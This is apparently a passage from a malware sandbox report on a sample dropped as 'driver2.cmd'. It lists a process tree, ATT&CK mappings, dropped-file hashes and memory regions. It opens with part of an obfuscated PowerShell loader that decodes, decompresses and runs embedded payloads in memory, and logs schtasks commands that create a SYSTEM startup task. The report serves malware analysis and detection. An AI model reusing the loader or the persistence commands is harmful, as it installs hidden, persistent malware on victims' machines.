System.IO.Compression.GZipStream($MSMky,[IO.Compression.CompressionMode]::($OtRn[5]));$qvVev.($OtRn[4])($wbEyv);$qvVev.Dispose();$MSMky.Dispose();$wbEyv.Dispose();$wbEyv.ToArray();}$idMoV=[System.IO.File]::($OtRn[11])([Console]::Title);$hoAcA=TnoCD (IpDBZ ([Convert]::($OtRn[12])([System.Linq.Enumerable]::($OtRn[10])($idMoV, 5).Substring(2))));$YKGvV=TnoCD (IpDBZ ([Convert]::($OtRn[12])([System.Linq.Enumerable]::($OtRn[10])($idMoV, 6).Substring(2))));[System.Reflection.Assembly]::($OtRn[3])([byte[]]$YKGvV).($OtRn[7]).($OtRn[6])($null,$null);[System.Reflection.Assembly]::($OtRn[3])([byte[]]$hoAcA).($OtRn[7]).($OtRn[6])($null,$null); "
      4⤵
      PID:916
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      4⤵
      Suspicious use of NtCreateUserProcessOtherParentProcess
      Suspicious behavior: EnumeratesProcesses
      PID:4440
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2728
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4440 -s 2516
        5⤵
        Program crash
        
        PID:3212
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4440 -s 2508
        5⤵
        Program crash
        
        PID:2876
- C:\Windows\system32\schtasks.exe
  schtasks /create /tn WinDriver /tr C:\ProgramData\Microsoft\WinDriver.cmd /sc onstart /ru SYSTEM
  2⤵
  - Creates scheduled task(s)
  PID:4620
- C:\Windows\system32\schtasks.exe
  schtasks /create /tn WinDriver /tr C:\ProgramData\Microsoft\WinDriver.cmd /sc onstart /ru SYSTEM
  2⤵
  - Creates scheduled task(s)
  PID:1644

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Scheduled Task/Job

T1053

Privilege Escalation

Scheduled Task/Job

T1053

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\driver2.cmd

Filesize
527KB

MD5
6b3481ee2156dfca31368c999a643b9a

SHA1
8b50185e57528328d0de936eb45b0ae8c6368536

SHA256
d3b75a962b7a326eb3fdb37ab46dc39e27f31876ef23427c23f5277cc41a9eb2

SHA512
4c47d74c4e42fd0f061861f5ac483172a0fcaa3960e79080ec665b0ac42d8376d62fc5e8acfd981629f9f24400df0993aa11d689413f771fbb09b303e5123b3d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat

Filesize
40B

MD5
c64929d71f8769929406b672778db163

SHA1
9dcbf05f8029ec6263ec43b6958a54626adb62d1

SHA256
b8d3e55babd999d4d2ada4cdae8d09b2b34321266395960c07ec811d08b91a0a

SHA512
9ce6eaea812713c9dc9de55875f5899b21b34e2fd09666590f0a4b3a4c6b3dcce382c5c1e73e01f4066c4b99024cda816ddb324701deabf2756c76e6f5977332

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000003

Filesize
217KB

MD5
4911a8d458bcc36f83993f5277293cbe

SHA1
3f6c6738a0c757f7db4e6b985dd0577f2e08b6be

SHA256
72c551824910d9918a8561cbca2e17e5e99d27d7cbf75e45d8b09e61c98cd307

SHA512
60368e0972044051587e5d3ddcdce0db1b0a374fc0e8e53fe9e34d674fb56d3ab636e3ca2cbd0260961eb9c664778b45c2d777f8b81bfc0520f24a00fbf94445

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000007

Filesize
32KB

MD5
551ade422b4afa7edad7ba0bc04f1dc6

SHA1
c32ae39cedb7e9e32f22c50b324a75fda421782b

SHA256
5b6abbd8e50b39c120fdaa80ee860e7a60170d9879a0438ade6a590da7493f63

SHA512
cbca8af71ad839c482ab0ff29eb9e2f0f67dba13af46023aeed9c81f0831eba342a8f026eac92665310c9b73d21c266be79f2c8b00cbe895cac33c6dc65f411e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000008

Filesize
33KB

MD5
b54a39d6949bfe6bae0d402cd2d80dc5

SHA1
9ac1ce7c7c0caec4e371059ac428068ce8376339

SHA256
6d26dfbcb723f0af3c891e9e45186deccb0f7e710106a379464c6f153792f792

SHA512
d86ac61ccc0a23d18594a8a7e8e444de4838fe1b7cfeea01ace66c91da139bedf811f5d1d5732c7da88a352af6b845f25bb87fc5a130ddf7450fd6d6b4146b6e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000011

Filesize
55KB

MD5
562e010ae3e82a726b3a43b7fbbdc3a0

SHA1
fb2f0a034aee3fd1b107225347f95a39eafd806d

SHA256
fdac6951d4394d9e2efd3785748b3977fbfd81e4650e199e7697af0e9d9317c9

SHA512
1dd6bf3fcfdd7ba70ebd68322e244733f8da7741ed17cd564f3d99cc524fd554af3ce238bea3661e4ed62ee136540529e112f4967af3a19fcb744638f5ec2ca4

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
2KB

MD5
f0553f205926375e55e2773d951d1780

SHA1
07c399bdc04176debf31cdbcd952da91f755b180

SHA256
0ff15d519dd2c89db408f7af445dc637e4d7aaa182a0cc92e2c53d6abee92f8b

SHA512
c278e8f3c4dd7c7040c410b09d80acf2149bce1a86cffdd39f433be3ea25d34f72884c5c0f71748d920c8d9e5c37cf00e201e2f53a33b20c7bdf57096eaa83b1

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
6KB

MD5
97f9dc5f1621ab4b664d0471eb8b0d95

SHA1
6412e0df225501b262d3e08ce196717a71a3b889

SHA256
fdf6af156c94f24d70b2372b6aabd4422b4c061523796124a3cf252ce0399d8b

SHA512
003d7ed9a66cba449b660ae7d8a4d6c936b0da528072b73780dd64259fc5f2a6912c7f7267d38d2464e965316a4f9cdf43dac63156fd031304206772e304fcf6

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
874B

MD5
d61063a950d2d0037adeb5ad27114dae

SHA1
e5b68c549cb7297715d49cd9cf51abe890283701

SHA256
5c77a79cfae0371d1746b8ca4318259af237ddfe91e9c4c9321897a13596448b

SHA512
42cffe3d39b2c166e5b03b16b08b124cdbffe305ba9e7eeecc9493b889c3711c89c015d2170a797e5e62bf331ba7f64400cb5d17ba71aa5c1334c59ed64d13cd

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
2KB

MD5
833bd89d56f3bc9f5e374e4b338ee83b

SHA1
552935173f649a4c00076cd5e0e188cf7d0538b6

SHA256
fab2c033611c393bad6a9f332f7436b880a3ab693aa2fafefbb83976134a9da5

SHA512
48ab1765a6d264bf2974b34c9f91d5bb2682b95ab2163e176d8540d4fca4b8314e551d5a8068b6d74a457308741f17d63ec0a20e4216bcc4a7778e0fda0c1e18

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
874B

MD5
b3dfd2f8f21bbcbf41452915ca4ffd81

SHA1
f2ca36ae27da1d1314dbd9dda377d79d35dd1229

SHA256
6e2514cfa0b82f3c399c0fe784f9c64f2ea77f5fbc64358829335be4c76d7364

SHA512
f3c3ad35d41aa8604b941830c0c9c20688f503914d6b63580bd496fab9668477ea7b9bf3fa37108c94c67eb5f3e9738f3747cbc2189b2f5d470944a87dd8b034

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
2KB

MD5
eddbd85eff77a66aea19ca3a18b3dd59

SHA1
a41f9d61c315104bec9340c0ecab468f38840d7c

SHA256
e4c463822db5cdd581c165768ec7ccdda61cf38ba0b4f858a8f571fd78a50d2a

SHA512
6133c2b8f37b95965c6fff60484fbd451b33fa0273941fc978e4f2b9ff259e26ee89ab66bb5c9ba8ca15276154750f1a4b07a87be372837d325baa64f6abd6c4

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
874B

MD5
519babf35f1c968f2f1da5a73bfe5a77

SHA1
7bde76d126d2899dde43c44881b567a7a708b9f9

SHA256
a40d9435cda01d11671a9e044f5b70ae5f34c8a4baecc2000e80cbfc653c4d33

SHA512
c3f75e38d7a39b3e82808d2a41971f357108b6e720e9c2552e146788c7b65a55185d604ccc68af9dd948ac73867ee639f419d155f8875edf81a308d148258f20

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
19212c2afe071159cc52a3a912749f97

SHA1
c87a4decf71c7d7ca5ef2bd30d2620f5b6968893

SHA256
4e992a60f8cac340f266dd8876590c4306e2c2041fd85c69741cdfc6fe541de6

SHA512
1d2559eee7886b7a6f1f1a29b357403e100f0c23fc25d3c72dfec4d84baa372fd088263b1acc7bd28df33c1c2e61a052a809f5d96cae8eed288d94f191052102

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
72864c4a32a3e1e4597e4c5ccd087c12

SHA1
e25098286bb775d0b50452152a97ede5d0f6a532

SHA256
58453003132e8b5a075ddf460640dbbfde42b9984944417452b48222a893a6b4

SHA512
d992f6a39a6847e496eae33348aab05a5bd7cec0ca8e3ea16a40d69d9585641c961065bc3d70764151899bae32254d21baf819046cad538065dc0d65e37cd7a3

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
408869336a1c6ff9d7778017210a948b

SHA1
82408585d17d2795e73ee67d100f0569a4bea83e

SHA256
9236703ab8cb5fac7b65b4ba69022b2f3cbc4e1106f58b7dd620cd32536f4076

SHA512
5b38cd465290589130d9ed459233d772a2da8c55b714e016c11d58bbced5dd759f2034176ba89e5a28b8d7afdbe5c20587fd4367630c8bede5b1b1c731ea4f3b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
53d229c3b00604b698cc809a2e32ecc0

SHA1
b1961c93481841ef225f07375cccbedd261f8b4a

SHA256
c515e9a36e42b85439a7007f741c43774915fc1de8e31df23b399d8f514c823d

SHA512
59fb350745c61c25dd5280e117200ba1e09f1ce0b9ce865cfd99219982b8b31a07e0546e847c1732ac4194c2dfb75ea917ba1994ebe3379f412c9373755ff9fa

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
f9cc9520cc8c62f9769a791f90a85237

SHA1
a8f5584f8fa87ae1218f0ba2b645ca205980bccd

SHA256
72aa393b9968a39670f60e3ed3053f1b68f87bddb322391749378901ec3f593d

SHA512
93762ea1bf37f49ba6cef6f284e57ccf88563540906634ae21bdb06a08d7f1e1f5a9469f3ac1f076f52c8ed4617eb4c58b1bc5b898cb35e9be010bcdcd0bb427

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
1a7aa98d50c83f73887a918f5f8e06c0

SHA1
d336a2fd2a03903f3f93afa5b9e0677d1c904d3b

SHA256
f0959897d25e556c41241d8471384d0cb5b9d2a095d4f9636a6766fca2d06c32

SHA512
39fac17a4315fd1f9b2c09a52828aa9e22c0c81d824003a554d8645b61a9419a17a892b3eebafd63ffd12e5d0c6037b5f9b2b8d16a57e86054fd2ab94bc4d015

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\8efbb31c-418f-47fe-a2f0-0f31288c3b91\index-dir\temp-index

Filesize
2KB

MD5
ad0a48398c58e50b6af5e93b683285d5

SHA1
bf9fa48b770070c6a5d4989010c5e35c6b8a1a36

SHA256
359241c6937d5601fd0cffe6ee4e4c143bb35bfa333f13cc2bb0e1bbd3e06c96

SHA512
c237f3039f8f87dc8f81fc8d5e2ab31bf8ffc0787580d20407da586ef0fe30643a78ee22c58d76b09f0b5c6a0bd2aeb10b334e574be141145e8df7163404a6ca

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\8efbb31c-418f-47fe-a2f0-0f31288c3b91\index-dir\the-real-index

Filesize
2KB

MD5
4dd97389a4d6576a715d47a03ffc4f09

SHA1
12c94715cc966dc7ab07dcb09f2c355a92c80266

SHA256
a0fec03e89096884660842994a52a5f0690149092a866b87406c04dc0c6927c3

SHA512
a9f15f1a69b326b0d5b03a7a3829b8fe19be03ad723de895982bfd0bc7c342b85241d87f5dfbdbea5ca90ed9fe2529078e379524da13f47416e467e554064b82

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\8efbb31c-418f-47fe-a2f0-0f31288c3b91\index-dir\the-real-index~RFe57850e.TMP

Filesize
48B

MD5
8d0dd66b26b93d2edeabec09af478298

SHA1
4c7934cd78d23f3e84600dcb1a03683c5525905c

SHA256
63f1f984cac33af4f1f437d66e861dd83633208036d8abd2fa50b3805ba7b395

SHA512
500636b2d18c587489b09ebea41ef919efa8c38514e5e464c8392a7c89833b61a8575a6dc3126b8883e82d74e0b59184f7818ce521aab96b4b8117e366882c62

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\bd43c093-b5ce-4c2d-b1b2-748632e46c97\index-dir\the-real-index

Filesize
624B

MD5
2386a822dff6ec77b6a337058ca9b2c7

SHA1
8f02c15a1b8231ee855c47502f9b6cd5f2b037d5

SHA256
09eb3790e57b4a1ae4786ad570a563ccb47da3a9fa5f25a30ebca71a97aa9960

SHA512
e77e3cb03f2f492226bfac231d044c4682f191a1ce8d38032b5b43861b0cef92178d09894daa072955989d6c493c7d5b1514032783b656c9f59e7a09a0ed41d4

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\bd43c093-b5ce-4c2d-b1b2-748632e46c97\index-dir\the-real-index~RFe57e9a4.TMP

Filesize
48B

MD5
dadea396efea29041bda2256945c0bac

SHA1
a68678b9ac6230c6fa5e369aaecedb12dd8e98d0

SHA256
700fef8473004a4ac198ba2b056babd01d7a82390814a34ca9d3c395e8f5906e

SHA512
712ce4574021c5efab122dca90e04d28af9ec304f5fb7211d5a3ada8e85fd0fa024c1ef0f21ce53bbb069b7834ba89d807d81be0e88a9905bf533e0d4c98bb84

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\cb215e75-5adc-412c-a5bd-0577fe5e0720\index

Filesize
24B

MD5
54cb446f628b2ea4a5bce5769910512e

SHA1
c27ca848427fe87f5cf4d0e0e3cd57151b0d820d

SHA256
fbcfe23a2ecb82b7100c50811691dde0a33aa3da8d176be9882a9db485dc0f2d

SHA512
8f6ed2e91aed9bd415789b1dbe591e7eab29f3f1b48fdfa5e864d7bf4ae554acc5d82b4097a770dabc228523253623e4296c5023cf48252e1b94382c43123cb0

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

Filesize
183B

MD5
61259df6215d3034f46843de55fa00b2

SHA1
6796430c3bf0c219ffe9290c057bf603740416d3

SHA256
44f72c7afef7488c68fc3e35ba9c9f7850ee722a400ca9f38fe70dc2a7530e66

SHA512
24a2a1e17d5fa7a4999e0aa2d97c9dffbbd349b413b0c161194c1fa8481f8739d59fbab1126500be411605dd176040f36e3c17ea1c49c2abf7c0fe0f6dd0b00c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

Filesize
176B

MD5
d0440876e989ed5cbfb051d678a9289f

SHA1
e16e5ee63b68c23bfac4a0e16c621bdcc71a3384

SHA256
1d1a26cc59d19f6c069dfa5a0c080992d6bc1e781534aed789637dea29666225

SHA512
4e65196810bdea521461625e8b260f4e5f77823a9f1a8189af70eb922fbbac7ee650f34626842d535d003ba4b06aa5fc41081c4a225bc4422004237e34850dad

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

Filesize
178B

MD5
4e126704107587823c802dea168d4f61

SHA1
db3705fdb291ea2ffa12a0f37d9f59b77e41feec

SHA256
1b113b67d5f80f0c7482278a49f66667521a9f28d353068999e2c743087cb6fd

SHA512
62520049c200cb75d4836833a90980645df3b0884b9f935866b324ef7c1e165573633d1d3a2630de04e5620d8ddf43ed69bc52c81492ae35b20f12899766b106

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

Filesize
114B

MD5
adcb89c5c43c8e28aec9af15a7cd4078

SHA1
107573ea109cc1f9a1ef43547703e450e5ba1ebc

SHA256
1ee0952f48584f641edad2a6be673f0f869b246b49bdf1cdee43e8070f281a4f

SHA512
db63d78bbfec24bc1043acb916332f56940d509b817fdd2c2657a904c74ac823129097e3771223d4138b58ea93a2fba9f38d6d9c1f9dfaffe06c4586227794f3

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

Filesize
112B

MD5
dae41655d12c26bf186fc081ab7723af

SHA1
5338c371c7ed40bca005acf651a338c039dce0b9

SHA256
7cf11c8f53bc2ed5b7c842f2d8d8bcb653972a53f4ee681d05c1cfa0b7affc13

SHA512
b889092b4a9b0451ce76258a2d92de05c62bd7191351dcc9d4f0d0c0ec4fd5dcb5f4b88ede8aeca64543d0a25192b42b518dfb1cffffecdea053a5613f9d2c39

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

Filesize
187B

MD5
9d224a177c754fb60485b7004c883428

SHA1
ff49be7bfae630289a754ff3e3a9919f5916a3f5

SHA256
5964ed5edd255a3bc9e4cc08a6526950ab561b88a87e59f885f49968202da4e2

SHA512
c6e94e7b81bdfac3168c05fe172f44d275380d450f06573b5e391f94dc5c2afd0df2b5e7fbd4ed8c9035a468c2d5d8d5d682f493242af350a4fe62b34c1d2b51

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt~RFe5774e2.TMP

Filesize
119B

MD5
2107e15bb8e6b5f038b1d97b7c24ed74

SHA1
008f2229797312b4a926f6da085269402810c85d

SHA256
d512f3328e335dafa5eebef2237652135dce641f8dea756e248b1a1c5c71537f

SHA512
87bb76d691cb4c954b59561764373df9c1692dada76bec087f76cfe031e0af04faec503a8433a0cf6695dc3ac8c458e9fd07b4c1de860401006b3fd688ebc75c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\Database\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

Filesize
96B

MD5
673f6281ca5a37fe7b9563c45c45d19d

SHA1
bceaec24a6e919d276f4362a1d004ffe5dac96e9

SHA256
f486638ade47bad02afef6c33e5dbdff2aa2ca1250017cfd29bfab5753d833a3

SHA512
aca91dd2857b9741ca76e1109a9a84df606bb3799f58798d836cbb595b3c815d567826766629b4a50818b28fdebccf7566c16d13d62baa40ce086c10be549872

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe57e03e.TMP

Filesize
48B

MD5
e0761a7bfe4e38eaf5f4921ab3da5957

SHA1
551e514c391aa62f030865368ac6b2c7a7201603

SHA256
964fb82f72b4cc732d0071b690d96f285897a1ad0e7fb9a06148469e7feee6ba

SHA512
71534225388fcfdd0c9c0ed08e09166dce946005c91a8334f174d05995fd7b51be663fdfca292c7424dda22cac3162d8c05dbdfa58d4337d15767fafab032a82

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Shortcuts Menu Icons\Monochrome\1\512.png

Filesize
10KB

MD5
7f57c509f12aaae2c269646db7fde6e8

SHA1
969d8c0e3d9140f843f36ccf2974b112ad7afc07

SHA256
1d5c9f67fe93f9fcc1a1b61ebc35bda8f98f1261e5005ae37af71f42aab1d90f

SHA512
3503a0f4939bed9e1fd5e086b17d6de1063220dffdab2d2373aa9582a2454a9d8f18c1be74442f4e597bdba796d2d69220bd9e6be632a15367225b804187ea18

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Temp\scoped_dir1900_1824300639\Shortcuts Menu Icons\Monochrome\0\512.png

Filesize
2KB

MD5
12a429f9782bcff446dc1089b68d44ee

SHA1
e41e5a1a4f2950a7f2da8be77ca26a66da7093b9

SHA256
e1d7407b07c40b5436d78db1077a16fbf75d49e32f3cbd01187b5eaaa10f1e37

SHA512
1da99c5278a589972a1d711d694890f4fd4ec4e56f83781ab9dee91ba99530a7f90d969588fa24dce24b094a28bdecbea80328cee862031a8b289f3e4f38ce7a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
136KB

MD5
3d19967497fb523bd47673f053a377f8

SHA1
768ca8defa1ee39dd81987f9ee4c625458c15057

SHA256
9f72a42e84b5a7021341730c503355f6c34a373484a9f4800e13a8b9e46909b4

SHA512
6aaf5ecb31f43a7134430cc40883b190fde417e98b16d3a25a285b8da6f392b2f11d673413b9ebd26fac120634cd176224cead281815426a32b150c65d3257df

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
136KB

MD5
f6630c0f1f905ee58566a0f067dd9080

SHA1
097edf5034438ea6a96c95a05813990bf9635454

SHA256
eb99382a4e883ea6d30cdf8adbd057e794ce11fd06c2d8c47267f14024f30e61

SHA512
8bc01a85a023de853559c15e52e8e0c57c8c72e7cb14df29acfcedf4e3aa4c9c57fa42c22ff67d8b2023e278af65924835c8387829fe679a5fed77681a71e3bd

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
136KB

MD5
17f3e0ddc857b07913578a99151febd6

SHA1
35bf271ae6ffe8dc855a3ee6437f4bed6c050e2e

SHA256
ac5605c04726173657b5c72beffb7c2d1f392262dde82026e7ab68c7844c60d7

SHA512
82c2cd286f722c792cf7383d50caabd58e2d08062bfb08835b4af7972751ebd4bafa873b72c8e3f20754c6570407e83819f6639b0fc7e66094650e4145dcf3dc

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache

Filesize
99KB

MD5
e2929d73b3262e03e9dd60e4f50db7f3

SHA1
52bed0c97d69bacb489df81e90a2d4da67a1b77a

SHA256
58b640b876f376c9c9fab01a3021119bdbed0da81908d004048da9466d80d328

SHA512
479938cf91b8db830aed2422c9da2f45d62be7722ba5bed451d0bc97650241dd011331874b2dae2eb50ef5f19a48acb1bf51cdad964b959c89eb62b25282d495

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache

Filesize
110KB

MD5
13f572e509d95b6f15796d3a8cbcc385

SHA1
3b57797099b3a253dc4886d441a7bed1e5618f8c

SHA256
e3420a6a5a19283311c79289119d98ed614cdaad8cdcd7d8e9837b236df6a805

SHA512
ae4439c9d4a11c56c5136a5e600c8ccf92ef07f6cb8985e70216f1ae264cf6375b02754084fa80f02606591348a0487ef9eb7a343e69cb90285dd197bf3e7ad9

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache~RFe57fbb5.TMP

Filesize
94KB

MD5
0499d19781d5f5c263f9dd46f4301f69

SHA1
74a32ea1a31bbf73a88b2d4e66ca42f584b103bd

SHA256
0686eb26cad0608c5d66d0488e15898d8f61131c100de8207779c6d01fb6a14f

SHA512
b8d8d0e6df72fbdc3e8b28e1622fde03e2e9c75263a47b5fa62214c750e3717dc9e256288c16234e7c7e90b10614981f1dfc3bad38a35605cb26dbce3bcbc2ca

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.json

Filesize
2B

MD5
99914b932bd37a50b983c5e7c90ae93b

SHA1
bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f

SHA256
44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a

SHA512
27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
7033adcdceef2520521477b094e52cc7

SHA1
6dbdc3aba745a40a79f2eb659f2b427aaf5ff62e

SHA256
bb10a63597ebc56a9c5e558c7b5bed8c1dde4856f7604ab987998d10eda3ac4e

SHA512
af9249bd6a64e28d1b03ce962618ce2a7e5a55dc57d1dbc8efcf2e4142e74f40e58b144952981c3a86771a9fd207e73986130edf7b7dfde2495347e284e8287e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
b0128aae678ac33f3008189e2d827ab3

SHA1
67df8777107f4959ae5f7f01bae78f69fe122092

SHA256
29307cd10c8b42b694c0a835895b5e177f1b614b27eeea1f214d8de784de682a

SHA512
e47fb0c160fcac453363777af2f8fc56a41472b75dc330bc9fa54913566a4d1b6cb250cfc4276729b78907adf733c0fd0a4ff4334e1aed1c108d93f46f80ea54

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_l2a4xli0.ws1.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\Downloads\Octo.zip.crdownload

Filesize
12.4MB

MD5
01b7de13b8bc8a313c4b40edac99e112

SHA1
8b359edfb542fe83fb310db5f31b188b4a8b08e1

SHA256
1f1a0d5697c39d7a8efd7db67ed1b09f11c5ee5fdad70d2c2127464cdbfbc89f

SHA512
dfcfff519490800ee8c6396d1270c9f0e8a806389f2982986a350a7c6c3c7ec93d4e34930a0b6f32daa25efd70e38e22484ff7e19231aade90a7c7094ad590f8

Download Submit
memory/2728-1327-0x0000000073B20000-0x000000007420E000-memory.dmp

Filesize
6.9MB

Download
memory/2728-1258-0x0000000073B20000-0x000000007420E000-memory.dmp

Filesize
6.9MB

Download
memory/2728-1309-0x0000000006A10000-0x0000000006A20000-memory.dmp

Filesize
64KB

Download
memory/2780-1130-0x00007FFC73280000-0x00007FFC73C6C000-memory.dmp

Filesize
9.9MB

Download
memory/2780-1116-0x000001BDA3150000-0x000001BDA3160000-memory.dmp

Filesize
64KB

Download
memory/2780-1072-0x00007FFC73280000-0x00007FFC73C6C000-memory.dmp

Filesize
9.9MB

Download
memory/2780-1071-0x000001BDA3090000-0x000001BDA30B2000-memory.dmp

Filesize
136KB

Download
memory/2780-1092-0x000001BDA3150000-0x000001BDA3160000-memory.dmp

Filesize
64KB

Download
memory/2780-1073-0x000001BDA3150000-0x000001BDA3160000-memory.dmp

Filesize
64KB

Download
memory/2780-1079-0x000001BDA3260000-0x000001BDA32D6000-memory.dmp

Filesize
472KB

Download
memory/2780-1074-0x000001BDA3150000-0x000001BDA3160000-memory.dmp

Filesize
64KB

Download
memory/4440-1339-0x0000000009F70000-0x0000000009F8A000-memory.dmp

Filesize
104KB

Download
memory/4440-1343-0x000000000A0F0000-0x000000000A146000-memory.dmp

Filesize
344KB

Download
memory/4440-1200-0x0000000007380000-0x00000000073A2000-memory.dmp

Filesize
136KB

Download
memory/4440-1201-0x0000000007A90000-0x0000000007AF6000-memory.dmp

Filesize
408KB

Download
memory/4440-1202-0x0000000007C00000-0x0000000007C66000-memory.dmp

Filesize
408KB

Download
memory/4440-1203-0x0000000007D60000-0x00000000080B0000-memory.dmp

Filesize
3.3MB

Download
